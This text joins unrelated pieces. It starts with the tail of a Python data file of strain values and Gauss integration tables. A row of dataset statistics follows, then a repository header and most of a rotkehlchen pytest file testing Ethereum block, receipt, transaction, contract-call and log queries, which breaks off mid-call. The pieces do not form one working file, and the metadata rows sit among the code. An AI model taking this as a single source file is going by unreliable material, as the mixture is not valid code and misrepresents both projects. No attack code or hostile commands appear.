[-26.7783E-12, 89.2611E-12, 0., -260.000E-12, 0., 0.],
[-26.7783E-12, 89.2611E-12, 0., -260.000E-12, 0., 0.],
[-26.7783E-12, 89.2611E-12, 0., -260.000E-12, 0., 0.],
[-26.7783E-12, 89.2611E-12, 0., -260.000E-12, 0., 0.],
[26.9841E-12, -89.9470E-12, 0., -260.000E-12, 0., 0.],
[26.9841E-12, -89.9470E-12, 0., -260.000E-12, 0., 0.],
[26.9841E-12, -89.9470E-12, 0., -260.000E-12, 0., 0.],
[26.9841E-12, -89.9470E-12, 0., -260.000E-12, 0., 0.],
[-27.2938E-12, 90.9793E-12, 0., -260.000E-12, 0., 0.],
[-27.2938E-12, 90.9793E-12, 0., -260.000E-12, 0., 0.],
[-27.2938E-12, 90.9793E-12, 0., -260.000E-12, 0., 0.],
[-27.2938E-12, 90.9793E-12, 0., -260.000E-12, 0., 0.],
[27.7085E-12, -92.3618E-12, 0., -260.000E-12, 0., 0.],
[27.7085E-12, -92.3618E-12, 0., -260.000E-12, 0., 0.],
[27.7085E-12, -92.3618E-12, 0., -260.000E-12, 0., 0.],
[27.7085E-12, -92.3618E-12, 0., -260.000E-12, 0., 0.],
[-28.2300E-12, 94.0999E-12, 0., -260.000E-12, 0., 0.],
[-28.2300E-12, 94.0999E-12, 0., -260.000E-12, 0., 0.],
[-28.2300E-12, 94.0999E-12, 0., -260.000E-12, 0., 0.],
[-28.2300E-12, 94.0999E-12, 0., -260.000E-12, 0., 0.],
[28.8601E-12, -96.2002E-12, 0., -260.000E-12, 0., 0.],
[28.8601E-12, -96.2002E-12, 0., -260.000E-12, 0., 0.],
[28.8601E-12, -96.2002E-12, 0., -260.000E-12, 0., 0.],
[28.8601E-12, -96.2002E-12, 0., -260.000E-12, 0., 0.],
[-29.6013E-12, 98.6710E-12, 0., -260.000E-12, 0., 0.],
[-29.6013E-12, 98.6710E-12, 0., -260.000E-12, 0., 0.],
[-29.6013E-12, 98.6710E-12, 0., -260.000E-12, 0., 0.],
[-29.6013E-12, 98.6710E-12, 0., -260.000E-12, 0., 0.]
],
columns=['E11', 'E22', 'E33', 'E12', 'E13', 'E23'],
index=beam_2d_squ_mesh_index
)
integration_type_content = {
'TYPE1': [0, 'GAUSS_TRIANGLE_3', 3, 2, 0.0,
[0.166667, 0.166667, 0.666667, 0.166667, 0.166667, 0.666667],
[0.333333, 0.333333, 0.333333], []],
'TYPE2': [1, 'GAUSS_QUAD_9', 9, 2, 0.0,
[-0.774597, -0.774597, 0, -0.774597, 0.774597, -0.774597, -0.774597, 0, 0, 0,
0.774597, 0, -0.774597, 0.774597, 0, 0.774597, 0.774597, 0.774597],
[0.308642, 0.493827, 0.308642, 0.493827, 0.790123, 0.493827, 0.308642, 0.493827, 0.308642], []]
}
| 40.860349
| 120
| 0.460726
| 2,731
| 16,385
| 2.727938
| 0.096668
| 0.075168
| 0.05557
| 0.048322
| 0.840268
| 0.802013
| 0.793557
| 0.750872
| 0.727517
| 0.708993
| 0
| 0.510225
| 0.280745
| 16,385
| 400
| 121
| 40.9625
| 0.121935
| 0.004821
| 0
| 0.569948
| 0
| 0
| 0.015732
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.005181
| 0
| 0.005181
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
8687dacdb2a6369e2fd4b4b7b839c5a535e2c2df
| 24,401
|
py
|
Python
|
rotkehlchen/tests/unit/test_ethereum_manager.py
|
rotkehlchenio/rotkehlchen
|
98f49cd3ed26c641fec03b78eff9fe1872385fbf
|
[
"BSD-3-Clause"
] | 137
|
2018-03-05T11:53:29.000Z
|
2019-11-03T16:38:42.000Z
|
rotkehlchen/tests/unit/test_ethereum_manager.py
|
rotkehlchenio/rotkehlchen
|
98f49cd3ed26c641fec03b78eff9fe1872385fbf
|
[
"BSD-3-Clause"
] | 385
|
2018-03-08T12:43:41.000Z
|
2019-11-10T09:15:36.000Z
|
rotkehlchen/tests/unit/test_ethereum_manager.py
|
rotkehlchenio/rotkehlchen
|
98f49cd3ed26c641fec03b78eff9fe1872385fbf
|
[
"BSD-3-Clause"
] | 59
|
2018-03-08T10:08:27.000Z
|
2019-10-26T11:30:44.000Z
|
import os
import pytest
from rotkehlchen.chain.ethereum.constants import ZERO_ADDRESS
from rotkehlchen.chain.ethereum.manager import (
ETHEREUM_NODES_TO_CONNECT_AT_START,
OPEN_NODES,
OPEN_NODES_WEIGHT_MAP,
NodeName,
)
from rotkehlchen.chain.ethereum.structures import EthereumTxReceipt, EthereumTxReceiptLog
from rotkehlchen.constants.ethereum import ATOKEN_ABI, ERC20TOKEN_ABI, YEARN_YCRV_VAULT
from rotkehlchen.constants.misc import ONE, ZERO
from rotkehlchen.db.ethtx import DBEthTx
from rotkehlchen.fval import FVal
from rotkehlchen.tests.utils.checks import assert_serialized_dicts_equal
from rotkehlchen.tests.utils.ethereum import (
ETHEREUM_FULL_TEST_PARAMETERS,
ETHEREUM_TEST_PARAMETERS,
wait_until_all_nodes_connected,
)
from rotkehlchen.tests.utils.factories import make_ethereum_address
from rotkehlchen.types import (
BlockchainAccountData,
EthereumTransaction,
SupportedBlockchain,
deserialize_evm_tx_hash,
make_evm_tx_hash,
)
from rotkehlchen.utils.hexbytes import hexstring_to_bytes
@pytest.mark.parametrize(*ETHEREUM_TEST_PARAMETERS)
def test_get_block_by_number(ethereum_manager, call_order, ethereum_manager_connect_at_start):
wait_until_all_nodes_connected(
ethereum_manager_connect_at_start=ethereum_manager_connect_at_start,
ethereum=ethereum_manager,
)
block = ethereum_manager.get_block_by_number(10304885, call_order=call_order)
assert block['timestamp'] == 1592686213
assert block['number'] == 10304885
assert block['hash'] == '0xe2217ba1639c6ca2183f40b0f800185b3901faece2462854b3162d4c5077752c'
@pytest.mark.parametrize(*ETHEREUM_FULL_TEST_PARAMETERS)
def test_get_transaction_receipt(
ethereum_manager,
call_order,
ethereum_manager_connect_at_start,
database,
):
wait_until_all_nodes_connected(
ethereum_manager_connect_at_start=ethereum_manager_connect_at_start,
ethereum=ethereum_manager,
)
tx_hash = deserialize_evm_tx_hash('0x12d474b6cbba04fd1a14e55ef45b1eb175985612244631b4b70450c888962a89') # noqa: E501
result = ethereum_manager.get_transaction_receipt(tx_hash, call_order=call_order)
block_hash = '0x6f3a7838a8788c3371b88df170c3643d19bad896c915a7368681292882b6ad61'
assert result['blockHash'] == block_hash
assert len(result['logs']) == 2
assert result['gasUsed'] == 144046
assert result['blockNumber'] == 10840714
assert result['logs'][0]['blockNumber'] == 10840714
assert result['logs'][1]['blockNumber'] == 10840714
assert result['status'] == 1
assert result['transactionIndex'] == 110
assert result['logs'][0]['transactionIndex'] == 110
assert result['logs'][1]['transactionIndex'] == 110
assert result['logs'][0]['logIndex'] == 235
assert result['logs'][1]['logIndex'] == 236
from_addy = make_ethereum_address()
to_addy = make_ethereum_address()
database.add_blockchain_accounts(
blockchain=SupportedBlockchain.ETHEREUM,
account_data=[
BlockchainAccountData(address=from_addy),
BlockchainAccountData(address=to_addy),
],
)
db = DBEthTx(database)
db.add_ethereum_transactions(
[EthereumTransaction( # need to add the tx first
tx_hash=tx_hash,
timestamp=1, # all other fields don't matter for this test
block_number=1,
from_address=from_addy,
to_address=to_addy,
value=1,
gas=1,
gas_price=1,
gas_used=1,
input_data=b'',
nonce=1,
)],
relevant_address=from_addy,
)
# also test receipt can be stored and retrieved from the DB.
# This tests that all node types (say openethereum) are processed properly
db.add_receipt_data(result)
receipt = db.get_receipt(tx_hash)
assert receipt == EthereumTxReceipt(
tx_hash=tx_hash,
contract_address=None,
status=True,
type=0,
logs=[
EthereumTxReceiptLog(
log_index=235,
data=b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02T\x0b\xe4\x00', # noqa: E501
address='0x5bEaBAEBB3146685Dd74176f68a0721F91297D37',
removed=False,
topics=[
b'\xdd\xf2R\xad\x1b\xe2\xc8\x9bi\xc2\xb0h\xfc7\x8d\xaa\x95+\xa7\xf1c\xc4\xa1\x16(\xf5ZM\xf5#\xb3\xef', # noqa: E501
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00s(*c\xf0\xe3\xd7\xe9`EuB\x0fwsa\xec\xa3\xc8j', # noqa: E501
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xb6 \xf1\x93ME\x84\xdd\xa6\x99\x9e\xdc\xad\xd3)\x81)dj\xa5', # noqa: E501
]), EthereumTxReceiptLog(
log_index=236,
data=b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xb6 \xf1\x93ME\x84\xdd\xa6\x99\x9e\xdc\xad\xd3)\x81)dj\xa5\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xb6 \xf1\x93ME\x84\xdd\xa6\x99\x9e\xdc\xad\xd3)\x81)dj\xa5\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00[\xea\xba\xeb\xb3\x14f\x85\xddt\x17oh\xa0r\x1f\x91)}7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02T\x0b\xe4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\r\xe0\xb6\xb3\xa7d\x00\x00', # noqa: E501
address='0x73282A63F0e3D7e9604575420F777361ecA3C86A',
removed=False,
topics=[b'\xd6\xd4\xf5h\x1c$l\x9fB\xc2\x03\xe2\x87\x97Z\xf1`\x1f\x8d\xf8\x03Z\x92Q\xf7\x9a\xab\\\x8f\t\xe2\xf8'], # noqa: E501
),
])
@pytest.mark.parametrize(*ETHEREUM_TEST_PARAMETERS)
def test_get_transaction_by_hash(ethereum_manager, call_order, ethereum_manager_connect_at_start):
wait_until_all_nodes_connected(
ethereum_manager_connect_at_start=ethereum_manager_connect_at_start,
ethereum=ethereum_manager,
)
result = ethereum_manager.get_transaction_by_hash(
hexstring_to_bytes('0x5b180e3dcc19cd29c918b98c876f19393e07b74c07fd728102eb6241db3c2d5c'),
call_order=call_order,
)
expected_tx = EthereumTransaction(
tx_hash=make_evm_tx_hash(b'[\x18\x0e=\xcc\x19\xcd)\xc9\x18\xb9\x8c\x87o\x199>\x07\xb7L\x07\xfdr\x81\x02\xebbA\xdb<-\\'), # noqa: E501
timestamp=1633128954,
block_number=13336285,
from_address='0x2F6789A208A05C762cA8d142A3df95d29C18b065',
to_address='0x7Be8076f4EA4A4AD08075C2508e481d6C946D12b',
value=33000000000000000,
gas=294144,
gas_price=66936353558,
gas_used=218523,
input_data=b"\xab\x83K\xab\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00{\xe8\x07oN\xa4\xa4\xad\x08\x07\\%\x08\xe4\x81\xd6\xc9F\xd1+\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00/g\x89\xa2\x08\xa0\\v,\xa8\xd1B\xa3\xdf\x95\xd2\x9c\x18\xb0e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00p\x8d\xfa\x06\xdfX\x9a\x1e\x19W9\x1b\x86.\x02\xf7\x17X$\xe9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00I_\x94rvt\x9c\xe6F\xf6\x8a\xc8\xc2HB\x00E\xcb{^\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00{\xe8\x07oN\xa4\xa4\xad\x08\x07\\%\x08\xe4\x81\xd6\xc9F\xd1+\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00p\x8d\xfa\x06\xdfX\x9a\x1e\x19W9\x1b\x86.\x02\xf7\x17X$\xe9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00[2V\x96^|<\xf2n\x11\xfc\xaf)m\xfc\x88\x07\xc0\x10s\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00I_\x94rvt\x9c\xe6F\xf6\x8a\xc8\xc2HB\x00E\xcb{^\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\xe2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00u=S=\x96\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00aW\x91\x84\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00C\x96\x18\xf8\xa6p,\x86\xbd?\xcf\x83\x8c3\xd3 \x89\x9f1\xffaX\x1a\r|\xa0\xcb\x12\xad\xbeY\xe9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\xe2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00u=S=\x96\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00aU\xa9E\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00bDI$\x9d\xc420bKZ\xb5v\x96\xf6\xef\xa0hg\x993\x00\x07y\x07]\x83\xc6\xd2I\x1c\x87\x19\x13\x1e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\xa0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\xa0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\xa0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\t\xa0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\n\xa0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\n\xc0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1c\x02\xe0\x9f\xaa\xce\x1aZ\xaf\\'\xb7&\x99l\x10\xe7u4\x11\xc6V\x17\xb3\xb5)z\xd5\x04/7\xd8\x04\x07y\xb1\xa8\xfe\x0c\x1c\xa5\xc9\xc4{e\x07\xa2:\xee\x0f\xb3&\xcf_3[{\xcc\x13]~o\xe9\xd1\xd8\x02\xe0\x9f\xaa\xce\x1aZ\xaf\\'\xb7&\x99l\x10\xe7u4\x11\xc6V\x17\xb3\xb5)z\xd5\x04/7\xd8\x04\x07y\xb1\xa8\xfe\x0c\x1c\xa5\xc9\xc4{e\x07\xa2:\xee\x0f\xb3&\xcf_3[{\xcc\x13]~o\xe9\xd1\xd8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc4\xf2BC*\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00/g\x89\xa2\x08\xa0\\v,\xa8\xd1B\xa3\xdf\x95\xd2\x9c\x18\xb0ep\x8d\xfa\x06\xdfX\x9a\x1e\x19W9\x1b\x86.\x02\xf7\x17X$\xe9\x00\x00\x00\x00\x00\x00\xac\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc4\xf2BC*\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00p\x8d\xfa\x06\xdfX\x9a\x1e\x19W9\x1b\x86.\x02\xf7\x17X$\xe9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00p\x8d\xfa\x06\xdfX\x9a\x1e\x19W9\x1b\x86.\x02\xf7\x17X$\xe9\x00\x00\x00\x00\x00\x00\xac\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc4\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", # noqa: E501
nonce=204,
)
assert result == expected_tx
@pytest.mark.parametrize('ethrpc_endpoint,ethereum_manager_connect_at_start,call_order', [
(
'',
[x for x in OPEN_NODES if x != NodeName.ETHERSCAN],
[x for x in OPEN_NODES if x != NodeName.ETHERSCAN],
),
])
def test_use_open_nodes(ethereum_manager, call_order, ethereum_manager_connect_at_start):
"""Test that we can connect to and use the open nodes (except from etherscan)
Note: If this fails with transaction not found probably open nodes started pruning.
Change test to use a more recent transaction.
"""
# Wait until all nodes are connected
wait_until_all_nodes_connected(
ethereum_manager_connect_at_start=ethereum_manager_connect_at_start,
ethereum=ethereum_manager,
)
result = ethereum_manager.get_transaction_receipt(
'0x1470187132df3b6755ed30774a772ec8bbc1cd27f10a8a6b7f6095dd95560f20',
call_order=call_order,
)
block_hash = '0x23daab1980fd238778750bf9ac732fa1bb45e3439fa208ac47f5995efb5924e3'
assert result['blockHash'] == block_hash
@pytest.mark.parametrize(*ETHEREUM_TEST_PARAMETERS)
def test_call_contract(ethereum_manager, call_order, ethereum_manager_connect_at_start):
wait_until_all_nodes_connected(
ethereum_manager_connect_at_start=ethereum_manager_connect_at_start,
ethereum=ethereum_manager,
)
result = ethereum_manager.call_contract(
contract_address=YEARN_YCRV_VAULT.address,
abi=YEARN_YCRV_VAULT.abi,
method_name='symbol',
call_order=call_order,
)
assert result == 'yyDAI+yUSDC+yUSDT+yTUSD'
# also test that doing contract.call() has the same result
result2 = YEARN_YCRV_VAULT.call(ethereum_manager, 'symbol', call_order=call_order)
assert result == result2
result = ethereum_manager.call_contract(
contract_address=YEARN_YCRV_VAULT.address,
abi=YEARN_YCRV_VAULT.abi,
method_name='balanceOf',
arguments=['0x5dbcF33D8c2E976c6b560249878e6F1491Bca25c'],
call_order=call_order,
)
assert result >= 0
@pytest.mark.parametrize(*ETHEREUM_TEST_PARAMETERS)
def test_get_logs(ethereum_manager, call_order, ethereum_manager_connect_at_start):
wait_until_all_nodes_connected(
ethereum_manager_connect_at_start=ethereum_manager_connect_at_start,
ethereum=ethereum_manager,
)
argument_filters = {
'from': '0x7780E86699e941254c8f4D9b7eB08FF7e96BBE10',
'to': YEARN_YCRV_VAULT.address,
}
events = ethereum_manager.get_logs(
